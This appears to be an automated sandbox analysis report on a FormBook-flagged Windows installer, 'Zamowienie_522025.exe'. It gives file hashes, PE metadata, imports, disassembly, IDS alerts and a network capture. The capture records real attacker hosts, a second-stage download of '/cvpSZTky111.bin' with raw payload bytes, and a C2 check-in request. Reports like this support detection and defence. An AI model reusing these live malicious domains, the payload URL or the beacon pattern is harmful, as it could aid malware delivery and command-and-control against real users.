File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.4030452760125
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Zamowienie_522025.exe
File size:	618'286 bytes
MD5:	6907177f927c1938c734040d386da280
SHA1:	70fe16c259d1ff1b9dac5c35696229d200052c09
SHA256:	e4da98104281d7be4d50895dd76d5aeefa7bf7f25514a1581c7466bc694c3ea8
SHA512:	f6617615bb88ff82ae4c185fabb21e4646376986e29c2aa9affccf5cf10426b6d1acfaa6dd983c496df9cbaf6ee2222dbad98ea8f0c901248f72e85520142f7a
SSDEEP:	12288:X7BlUtUcVx0hQOrrteRy3WvHw8kSZtW8l0/jpQG8V:X7k7r0hltQc2Q8TZZ0FQG8V
TLSH:	C9D40241B641D6E2E19A4A710927CF3A0BF67C7997102A7B374DBBEE29B3170410B91F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...<.oZ.................h.........

File Icon


Icon Hash:	070d360e2c1ccd36

Static PE Info

General

Entrypoint:	0x40338f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A6FED3C [Tue Jan 30 03:57:48 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [00434EECh], eax
je 00007F075489F9C3h
push ebx
call 00007F07548A2C75h
cmp eax, ebx
je 00007F075489F9B9h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F07548A2BEFh
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F075489F99Ch
push 0000000Ah
call 00007F07548A2C48h
push 00000008h
call 00007F07548A2C41h
push 00000006h
mov dword ptr [00434EE4h], eax
call 00007F07548A2C35h
cmp eax, ebx
je 00007F075489F9C1h
push 0000001Eh
call eax
test eax, eax
je 00007F075489F9B9h
or byte ptr [00434EEFh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [00434FB8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0042B208h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8608	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x57000	0x28380	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6627	0x6800	8c030dfed318c62753a7b0d60218279b	False	0.6642503004807693	data	6.452235553722483	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x149a	0x1600	966a3835fd2d9407261ae78460c26dcc	False	0.43803267045454547	data	5.007075185851696	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2aff8	0x600	939516377e7577b622eb1ffdc4b5db4a	False	0.517578125	data	4.03532418489749	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x22000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x57000	0x28380	0x28400	fba39d7a1f30481641f2cd886366b333	False	0.370996700310559	data	4.748651802067756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x57328	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.26894297882408613
RT_ICON	0x67b50	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.43496426319108683
RT_ICON	0x70ff8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.4680221811460259
RT_ICON	0x76480	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.43658478979688237
RT_ICON	0x7a6a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4592323651452282
RT_ICON	0x7cc50	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.5574577861163227
RT_ICON	0x7dcf8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.5983606557377049
RT_ICON	0x7e680	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6852836879432624
RT_DIALOG	0x7eae8	0x100	data	English	United States	0.5234375
RT_DIALOG	0x7ebe8	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0x7ed08	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x7ed68	0x76	data	English	United States	0.7457627118644068
RT_VERSION	0x7ede0	0x260	data	English	United States	0.5148026315789473
RT_MANIFEST	0x7f040	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Version Infos

Description	Data
Comments	nene afbruddet originalprogrammet
CompanyName	exponentially transfusioner prissttendes
FileVersion	2.2.0.0
LegalCopyright	remodifying tilsmagt
ProductVersion	2.2.0.0
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-05T14:45:11.301928+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	51633	104.21.94.11	80	TCP
2025-03-05T14:45:11.301928+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	51633	104.21.94.11	80	TCP
2025-03-05T14:45:40.425622+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49765	195.252.110.146	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 5, 2025 14:45:38.232892990 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:38.232932091 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:38.233004093 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:38.248316050 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:38.248337030 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:38.950170994 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:38.950268030 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.077276945 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.077294111 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.077661037 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.077716112 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.090935946 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.132333994 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.425600052 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.425620079 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.425649881 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.425662994 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.425683022 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.425688982 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.425734043 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.428816080 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.428833961 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.428894997 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.428908110 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.428945065 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.535541058 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.535562992 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.535629034 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.535645962 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.535686970 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.536916018 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.536931038 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.536990881 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.536997080 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.537035942 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.539236069 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.539252043 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.539302111 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.539309025 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.539405107 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.541079998 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.541095018 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.541157007 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.541163921 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.541218996 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.645435095 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.645461082 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.645534992 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.645544052 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.645592928 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.646038055 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.646056890 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.646100044 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.646105051 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.646138906 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.646935940 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.646951914 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.646989107 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.646992922 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.647020102 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.647037983 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.647208929 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.647223949 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.647275925 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.647279978 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.647324085 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.648051977 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.648068905 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.648113966 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.648118019 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.648154020 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.737024069 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.737044096 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.737111092 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.737123013 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.737183094 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.737575054 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.737590075 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.737648964 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.737653971 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.737694979 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.778013945 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.778038979 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.778099060 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.778105974 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.778125048 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.778156042 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.778182983 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.778515100 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.778536081 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.778573990 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.778579950 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.778604031 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.778624058 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.779376030 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.779400110 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.779448032 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.779453039 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.779476881 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.779504061 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.779504061 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.779510975 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.779519081 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.779527903 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.779548883 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:45:40.779565096 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.779597998 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.779901981 CET	49765	443	192.168.2.7	195.252.110.146
Mar 5, 2025 14:45:40.779912949 CET	443	49765	195.252.110.146	192.168.2.7
Mar 5, 2025 14:46:08.279329062 CET	51592	53	192.168.2.7	162.159.36.2
Mar 5, 2025 14:46:08.284388065 CET	53	51592	162.159.36.2	192.168.2.7
Mar 5, 2025 14:46:08.286267042 CET	51592	53	192.168.2.7	162.159.36.2
Mar 5, 2025 14:46:08.291312933 CET	53	51592	162.159.36.2	192.168.2.7
Mar 5, 2025 14:46:08.768191099 CET	51592	53	192.168.2.7	162.159.36.2
Mar 5, 2025 14:46:08.775799036 CET	53	51592	162.159.36.2	192.168.2.7
Mar 5, 2025 14:46:08.775851011 CET	51592	53	192.168.2.7	162.159.36.2
Mar 5, 2025 14:46:47.887670040 CET	51633	80	192.168.2.7	104.21.94.11
Mar 5, 2025 14:46:47.892786026 CET	80	51633	104.21.94.11	192.168.2.7
Mar 5, 2025 14:46:47.892940998 CET	51633	80	192.168.2.7	104.21.94.11
Mar 5, 2025 14:46:47.908389091 CET	51633	80	192.168.2.7	104.21.94.11
Mar 5, 2025 14:46:47.913400888 CET	80	51633	104.21.94.11	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 5, 2025 14:45:38.136224031 CET	53992	53	192.168.2.7	1.1.1.1
Mar 5, 2025 14:45:38.226447105 CET	53	53992	1.1.1.1	192.168.2.7
Mar 5, 2025 14:45:53.995661974 CET	59802	53	192.168.2.7	1.1.1.1
Mar 5, 2025 14:45:54.085616112 CET	53	59802	1.1.1.1	192.168.2.7
Mar 5, 2025 14:46:08.277765036 CET	53	65092	162.159.36.2	192.168.2.7
Mar 5, 2025 14:46:08.821505070 CET	53	65468	1.1.1.1	192.168.2.7
Mar 5, 2025 14:46:47.861500978 CET	58437	53	192.168.2.7	1.1.1.1
Mar 5, 2025 14:46:47.880963087 CET	53	58437	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 5, 2025 14:45:38.136224031 CET	192.168.2.7	1.1.1.1	0x4324	Standard query (0)	mastertechnics.co.rs	A (IP address)	IN (0x0001)	false
Mar 5, 2025 14:45:53.995661974 CET	192.168.2.7	1.1.1.1	0x8353	Standard query (0)	mastertechnics.co.rs	A (IP address)	IN (0x0001)	false
Mar 5, 2025 14:46:47.861500978 CET	192.168.2.7	1.1.1.1	0xcca7	Standard query (0)	www.frpisealbites.cyou	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 5, 2025 14:45:38.226447105 CET	1.1.1.1	192.168.2.7	0x4324	No error (0)	mastertechnics.co.rs	195.252.110.146	A (IP address)	IN (0x0001)	false
Mar 5, 2025 14:45:54.085616112 CET	1.1.1.1	192.168.2.7	0x8353	No error (0)	mastertechnics.co.rs	195.252.110.146	A (IP address)	IN (0x0001)	false
Mar 5, 2025 14:46:47.880963087 CET	1.1.1.1	192.168.2.7	0xcca7	No error (0)	www.frpisealbites.cyou	104.21.94.11	A (IP address)	IN (0x0001)	false
Mar 5, 2025 14:46:47.880963087 CET	1.1.1.1	192.168.2.7	0xcca7	No error (0)	www.frpisealbites.cyou	172.67.217.209	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mastertechnics.co.rs

www.frpisealbites.cyou

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	51633	104.21.94.11	80	2716	C:\Program Files (x86)\ncroULbJZpHGYSIgpitUQgkGnvUeHmkeLGCyBjsiiKEHNrVbsDaTE\2eU7UhU9Bd9ebl2M5FZ9.exe

Timestamp	Bytes transferred	Direction	Data
Mar 5, 2025 14:46:47.908389091 CET	571	OUT	GET /jlus/?OdQH=z8iiYw+Stw8cg8s0yCOm8FORRNTkmq1qJ2c0oLR1FTZ5MsQo40fD2YfHM+PHDiM3M0h9zAEgo28fhIzZNKCAdTen7c9YY8PKJLnaEMzq/uipFbl8xTPbmSxkYku39afrs4PwL2H3GZ4V&02W=1TxDX6 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.frpisealbites.cyou Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.3)

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49765	195.252.110.146	443	1648	C:\Users\user\Desktop\Zamowienie_522025.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 13:45:40 UTC	180	OUT	GET /cvpSZTky111.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Host: mastertechnics.co.rs Cache-Control: no-cache
2025-03-05 13:45:40 UTC	517	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 05 Mar 2025 13:45:40 GMT Content-Type: application/octet-stream Content-Length: 288320 Connection: close Last-Modified: Wed, 05 Mar 2025 05:31:54 GMT ETag: "14796a86-46640-62f91b50a8e0c" Cache-Control: max-age=1209600 Expires: Wed, 19 Mar 2025 13:45:40 GMT X-Proxy-Cache: BYPASS Set-Cookie: uid=w/xukmfIVYSA9y8yAyurAg==; expires=Fri, 04-Apr-25 13:45:40 GMT; domain=$host; path=/ P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID" Accept-Ranges: bytes
2025-03-05 13:45:40 UTC	14843	IN	Data Raw: f9 4b 99 f7 ee 1b 74 3a 15 00 c6 60 a9 4f c3 c8 11 6b 75 9a 57 1e 88 17 24 f7 31 50 ed 7b 72 50 ad 47 6b 39 ee bf ec 09 82 8e cc 86 da 71 11 c6 01 c6 78 83 0e 12 a7 99 1d f6 07 35 60 81 66 0c 4c 82 a1 a7 e5 fd ae 99 46 8d b2 33 df 0d 72 68 5a 2c a3 26 db 32 9d 5a 8e 78 50 54 3d 14 06 74 71 90 8c 90 37 77 f6 52 83 0b ec 78 44 6d ab 16 2c 13 4a 39 b9 1a 51 d9 d9 b8 98 28 96 44 c3 24 f5 d6 49 cb a5 ae 15 e1 e4 78 0e ee 38 63 2b 73 3a b7 f3 b7 a7 b0 fe 7a a8 74 03 c6 1c 8e 77 1e 00 3b de c6 65 46 b1 80 b2 d2 d6 09 2e 60 00 f4 fc 07 a2 15 23 f1 a6 a4 1e 84 0b 53 b3 3d 27 c9 af 82 c9 49 f7 9f 33 5b 1b 5e 59 6c 22 ea cf c3 da b4 dc 4f 04 b3 6a 16 3b cd 2a e4 c5 64 3b 72 95 9f 42 81 c4 4f bb d5 ae 5f 9b 60 51 18 35 ea 71 00 1b ee 9d 8a 2d 03 aa 07 61 71 5e 5f f6 Data Ascii: Kt:`OkuW$1P{rPGk9qx5`fLF3rhZ,&2ZxPT=tq7wRxDm,J9Q(D$Ix8c+s:ztw;eF.`#S='I3[^Yl"Oj;*d;rBO_`Q5q-aq^_
2025-03-05 13:45:40 UTC	1024	IN	Data Raw: 3f f0 6a b2 5b a8 cf e3 c7 8d 21 ac a9 9e 54 9d c1 71 f8 81 16 3c 41 f8 4d 37 47 0a 9a c6 41 63 7a 92 a4 f2 95 47 48 ab 6f 70 b2 66 e8 72 03 e7 49 bc 0a aa e4 19 38 a7 b0 4d dd c8 82 41 a1 02 eb f6 dc 7e 19 2c e8 c0 06 2b b9 fe 21 58 66 84 d7 1a 99 67 9c 90 b3 e5 25 95 ef 69 da c8 53 e7 ed c1 27 62 46 a0 ed 0d 1f 23 92 07 78 77 3e 44 be 88 77 70 82 f4 47 d5 b1 62 92 8f a0 d9 5e 09 21 8d e7 40 96 03 60 5d ae 22 c7 36 0d db 6d ac c2 bc 90 90 04 16 dd 8f 87 03 cc 30 b0 b5 e4 12 49 be 58 d9 04 1e 21 96 ea 1d 7d d2 a6 23 b7 93 f6 80 8e e1 64 47 ae e5 f4 21 ff 22 4c 80 66 8c e0 0e dc c0 68 40 e2 f7 48 b0 66 b8 f4 8a 86 cf 85 73 e3 db e8 96 f7 b2 d5 a0 84 cb 32 d5 0b b0 2d 74 c1 88 64 f0 2e 20 0c 95 65 99 fd dd e4 da c2 6e f0 a4 17 87 b1 94 d0 27 76 05 7b a5 5c Data Ascii: ?j[!Tq<AM7GAczGHopfrI8MA~,+!Xfg%iS'bF#xw>DwpGb^!@`]"6m0IX!}#dG!"Lfh@Hfs2-td. en'v{\
